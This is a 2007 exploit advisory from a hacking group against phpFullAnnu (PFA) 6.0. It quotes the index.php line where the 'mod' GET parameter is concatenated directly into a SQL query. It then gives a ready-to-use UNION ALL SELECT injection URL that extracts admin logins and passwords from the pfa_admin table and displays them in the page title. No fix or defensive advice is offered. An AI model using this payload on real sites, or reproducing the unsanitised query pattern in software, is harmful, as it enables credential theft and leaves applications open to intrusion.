######################################################################################### # # Inclusion Hunter Team # http://www.ihteam.net # # # [phpFullAnnu (PFA) 6.0] # # # Class: SQL Injection # Found: 22/09/2007 # Remote: Yes # Site: http://pfa.netsliver.com/ # Download: http://pfa.netsliver.com/download/download.php?Fichier=pfa-v6.tgz # Author: R00T[ATI] of IHTeam # Contact: r00t.ati@ihteam.net - http://www.ihteam.net ########################################################################################## Vulnerable code: index.php ============================================================================================================ $sqltitle = $bdd->readresult($bdd->request('SELECT h_title FROM '.$tbprefix.'heading WHERE h_mod = \''.$_GET['mod'].'\'')); [...] //in /include/meta.inc.php <?php echo $title_site, ' - ', $sqltitle;... //So watch Title bar to see the injection ============================================================================================================ Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!): =================================================================================================================== http://www.site.com/[path]/?lang=fr&mod=login' UNION ALL SELECT concat(a_login ,0x3a,a_password) FROM pfa_admin/* =================================================================================================================== Thanks To: ================================= White_Sheep for his Bugs Hunter; =================================